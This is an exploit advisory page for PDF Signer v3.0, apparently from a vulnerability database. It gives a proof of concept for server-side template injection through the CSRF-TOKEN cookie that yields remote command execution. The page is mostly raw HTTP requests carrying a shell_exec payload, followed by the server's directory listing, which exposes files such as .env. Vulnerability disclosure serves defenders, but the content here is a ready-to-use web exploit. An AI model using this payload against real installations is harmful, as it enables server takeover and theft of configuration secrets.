PDF Signer 3.0 Template Injection / CSRF / Code Execution

2019.01.29
Credit: dd_
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# Exploit Title: PDF Signer v3.0 - SSTI to RCE via CSRF Cookie # Dork: N/A # Date: 2019-01-28 # Exploit Author: dd_ (info@malicious.group) # Vendor Homepage: https://codecanyon.net/user/simcy_creative # Software Link: https://codecanyon.net/item/signer-create-digital-signatures-and-sign-pdf-documents-online/20737707 # Version: v3.0 # Tested on: PHP/MySQL (PHP 7.2 / MySQL 5.7.25-0ubuntu0.18.04.2-log) # Vendor Banner: Signer v3.0 a Create Digital signatures and Sign PDF documents # Research IRC: irc.blackcatz.org #blackcatz # Vulnerability: Server-Side Template Injection leading to Remote Command Execution due to improper Cookie handling and improper CSRF implementation. # POC: # 1) GET / HTTP/1.1 Host: signer.local User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: http://signer.local/signin/?secure=true Connection: close Cookie: CSRF-TOKEN=rnqvt{{[PHP_COMMAND_HERE]}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl Upgrade-Insecure-Requests: 1 # Example [REQUEST] GET / HTTP/1.1 Host: signer.local User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: http://signer.local/signin/?secure=true Connection: close Cookie: CSRF-TOKEN=rnqvt{{shell_exec('ls -lah')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl Upgrade-Insecure-Requests: 1 [RESPONSE] --half way down page---snip-- <label>Folder name</label> <input type="text" class="form-control" name="foldername" placeholder="Folder name" data-parsley-required="true"> <input type="hidden" name="folder" value="1"> <input type="hidden" name="folderid"> <input type="hidden" name="csrf-token" value="rnqvttotal 112K drwxr-xr-x 9 www-data www-data 4.0K Jan 28 12:04 . drwxr-xr-x 6 www-data www-data 4.0K Jan 28 06:19 .. -rw-r--r-- 1 www-data www-data 1.1K Jan 28 12:03 .env -rw-r--r-- 1 www-data www-data 532 Jan 9 20:52 .htaccess drwxr-xr-x 9 www-data www-data 4.0K Jan 9 20:53 assets -rw-r--r-- 1 www-data www-data 947 Jan 9 20:52 composer.json -rw-r--r-- 1 www-data www-data 54K Jan 9 20:52 composer.lock drwxr-xr-x 2 www-data www-data 4.0K Jan 28 11:59 config -rw-r--r-- 1 www-data www-data 1.7K Jan 9 20:52 cron.php -rw-r--r-- 1 www-data www-data 169 Jan 9 20:52 index.php drwxr-xr-x 3 www-data www-data 4.0K Jan 9 20:53 lang drwxr-xr-x 6 www-data www-data 4.0K Jan 28 11:46 src drwxr-xr-x 9 www-data www-data 4.0K Jan 9 20:53 uploads drwxr-xr-x 24 www-data www-data 4.0K Jan 9 20:53 vendor drwxr-xr-x 6 www-data www-data 4.0K Jan 9 20:53 views to5gw" /> </div> </div> </div> --- snip ---


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top